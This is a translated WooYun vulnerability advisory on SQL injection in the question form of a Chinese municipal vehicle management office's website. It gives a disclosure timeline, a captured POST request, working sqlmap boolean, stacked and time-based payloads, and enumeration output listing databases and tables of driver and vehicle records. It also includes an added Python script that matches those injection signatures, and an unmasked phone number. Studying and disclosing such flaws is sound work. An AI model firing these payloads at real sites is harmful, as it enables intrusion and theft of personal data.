
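Vulnerability summary

Bug ID: wooyun-2015-0150710

Title: SQL injection at an endpoint of the Xinxiang Municipal Public Security Bureau Vehicle Management Office (apparently exposing vehicle-owner information for the whole city)

Vendor: Xinxiang Municipal Public Security Bureau Vehicle Management Office

Author: 路人甲

Submitted: 2015-10-31 10:57

Fixed: 2015-12-18 09:20

Published: 2015-12-18 09:20

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organisation (First Research Institute of the Ministry of Public Security) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]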


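Vulnerability details

Disclosure status:

2015-10-31: Details sent to the vendor; awaiting vendor handling
2015-11-03: Vendor confirmed; details disclosed to the vendor only
2015-11-13: Details disclosed to core white hats and relevant domain experts
2015-11-23: Details disclosed to regular white hats
2015-12-03: Details disclosed to trainee white hats
2015-12-18: Details disclosed to the public

Brief description:

SQL injection at an endpoint of the Xinxiang Municipal Public Security Bureau Vehicle Management Office

Detailed description:

http://**.**.**.**/addQuestion.aspx


At the submission form: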

POST /addQuestion.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://**.**.**.**/addQuestion.aspx
Cookie: CNZZDATA4639901=cnzz_eid%3D319043224-1444190633-http%253A%252F%252F**.**.**.**%252F%26ntime%3D1446195445; ASP.NET_SessionId=w14shfej240auwauczi0akru
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 4269

__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=[omitted]&__EVENTVALIDATION=[omitted]&DropDownList1=6&txt_name=%E9%99%88%E6%99%A8&biaoti=xxxxxxxxx&Tel=15181869462&E_mail=1521073798%**.**.**.**&TextBox1=%E8%A1%8C%E8%A1%8C%E8%A1%8C%E8%A1%8C%E8%A1%8C%E8%A1%8C%E8%A1%8C%E8%A1%8C%E8%A1%8C%E8%A1%8C%E8%A1%8C%E8%A1%8C%E8%A1%8C&Button1=%E6%8F%90+%E4%BA%A4


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: biaoti (POST)
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=[omitted]&__EVENTVALIDATION=[omitted]&DropDownList1=6&txt_name=%E9%99%88%E6%99%A8&biaoti=xxxxxxxxx';IF(1785=1785) SELECT 1785 ELSE DROP FUNCTION Oqyz--&Tel=15181869462&E_mail=1521073798@**.**.**.**&TextBox1=xxxxxxxxxxxxxxxxxxxx&Button1=%E6%8F%90 %E4%BA%A4
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=[omitted]&__EVENTVALIDATION=[omitted]&DropDownList1=6&txt_name=%E9%99%88%E6%99%A8&biaoti=xxxxxxxxx';WAITFOR DELAY '0:0:5'--&Tel=15181869462&E_mail=1521073798@**.**.**.**&TextBox1=xxxxxxxxxxxxxxxxxxxx&Button1=%E6%8F%90 %E4%BA%A4
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=[omitted]&__EVENTVALIDATION=[omitted]&DropDownList1=6&txt_name=%E9%99%88%E6%99%A8&biaoti=xxxxxxxxx' WAITFOR DELAY '0:0:5'--&Tel=15181869462&E_mail=1521073798@**.**.**.**&TextBox1=xxxxxxxxxxxxxxxxxxxx&Button1=%E6%8F%90 %E4%BA%A4
---
[19:24:24] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[19:24:24] [INFO] fetching database names
[19:24:24] [INFO] fetching number of databases
[19:24:24] [INFO] resumed: 12
[19:24:24] [INFO] resumed: cgs
[19:24:24] [INFO] resumed: gongan
[19:24:24] [INFO] resumed: master
[19:24:24] [INFO] resumed: model
[19:24:24] [INFO] resumed: msdb
[19:24:24] [INFO] resumed: NewTripKH
[19:24:24] [INFO] resumed: NewTripMember
[19:24:24] [INFO] resumed: NewTripXB
[19:24:24] [INFO] resumed: sitecmstest
[19:24:24] [INFO] resumed: tempdb
[19:24:24] [INFO] resumed: wztest
[19:24:24] [INFO] resumed: xbtest
available databases [12]:
[*] cgs
[*] gongan
[*] master
[*] model
[*] msdb
[*] NewTripKH
[*] NewTripMember
[*] NewTripXB
[*] sitecmstest
[*] tempdb
[*] wztest
[*] xbtest
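
The three techniques sqlmap reports against the `biaoti` POST field leave recognisable T-SQL fragments in the request body, which makes them searchable in web or WAF logs. The following Python code is an added example, not part of the original report: it scans urlencoded WebForms bodies for those fragments. The signature list, the `scan_body` function and the sample bodies are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# WebForms framework fields carry opaque server-generated state, not user text.
FRAMEWORK_FIELDS = {"__VIEWSTATE", "__EVENTVALIDATION", "__EVENTTARGET",
                    "__EVENTARGUMENT", "__LASTFOCUS"}

# One signature per technique named in the sqlmap output (T-SQL specific).
SIGNATURES = [
    ("stacked-query", re.compile(
        r"'\s*;\s*(?:if|select|waitfor|drop|exec|declare|insert|update|delete)\b",
        re.I)),
    ("boolean-if", re.compile(r"\bif\s*\(\s*\d+\s*=\s*\d+\s*\)\s*select\b", re.I)),
    ("time-delay", re.compile(r"\bwaitfor\s+delay\s+'\d+:\d+:\d+", re.I)),
]


def scan_body(body):
    """Return [(field, signature), ...] for a urlencoded POST body."""
    findings = []
    # separator="&" keeps ';' inside a value instead of splitting on it.
    for field, value in parse_qsl(body, keep_blank_values=True, separator="&"):
        if field in FRAMEWORK_FIELDS:
            continue
        for name, pattern in SIGNATURES:
            if pattern.search(value):
                findings.append((field, name))
    return findings


# Constructed sample bodies, modelled on the request in this report
# (ViewState shortened; values are illustrative, not captured traffic).
SAMPLES = {
    "benign": "__VIEWSTATE=%2FwEP&DropDownList1=6"
              "&biaoti=driver%27s+licence%3B+renewal",
    "boolean": "__VIEWSTATE=%2FwEP&biaoti=x%27%3BIF%281785%3D1785%29"
               "+SELECT+1785+ELSE+DROP+FUNCTION+Oqyz--",
    "stacked": "__VIEWSTATE=%2FwEP"
               "&biaoti=x%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&Tel=0",
    "time": "__VIEWSTATE=%2FwEP"
            "&biaoti=x%27+WAITFOR+DELAY+%270%3A0%3A5%27--&Tel=0",
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, scan_body(body))
```

Matching signatures only surfaces probing in logs; the injection itself is closed by passing form values to SQL Server as bound parameters rather than concatenated text.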


Proof of vulnerability:

Database: cgs
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| dbo.Web_WeifaChe | 1684209 |
| dbo.Web_drivingLicense | 1526014 |
| dbo.Web_VEHICLE | 1113756 |
| dbo.Web_WeiFa | 670576 |
| dbo.Web_drv_preasign | 488730 |
| dbo.SMSSendLogs | 448154 |
| dbo.SMSSentSave | 448154 |
| dbo.View_1 | 32418 |
| dbo.WEB_XB | 32395 |
| dbo.asks | 25232 |
| dbo.JszEditApp | 18020 |
| dbo.Web_User | 12814 |
| dbo.Web_dataLog | 9060 |
| dbo.WEB_XB_SMS | 7539 |
| dbo.CarEditApp | 6272 |
| dbo.webjianyi | 1557 |
| dbo.CheSYAPP | 541 |
| dbo.Web_JiaXiao | 44 |
| dbo.Web_ztsm | 31 |
| dbo.CheYYAPP | 24 |
| dbo.JszYwApp | 21 |
| dbo.Web_hospital | 20 |
| dbo.Web_Cards | 15 |
| dbo.Web_SqlLogs | 14 |
| dbo.Web_Menu | 13 |
| dbo.SMSConfig | 8 |
| dbo.wsyytype | 8 |
| dbo.dtproperties | 7 |
| dbo.Web_DataConfig | 5 |
| dbo.Web_Lasted_Up | 5 |
| dbo.asktype | 3 |
| dbo.ApiIpPass | 2 |
| dbo.CheSYConfig | 1 |
| dbo.Web_YouZheng | 1 |
+------------------------+---------+

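Remediation:

Copyright notice: when reposting, please credit the source: 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 6

Confirmed: 2015-11-03 09:20

Vendor reply:

Thank you for the submission!!
We have verified and confirmed the issue described and have notified them to fix it.

Latest status:

None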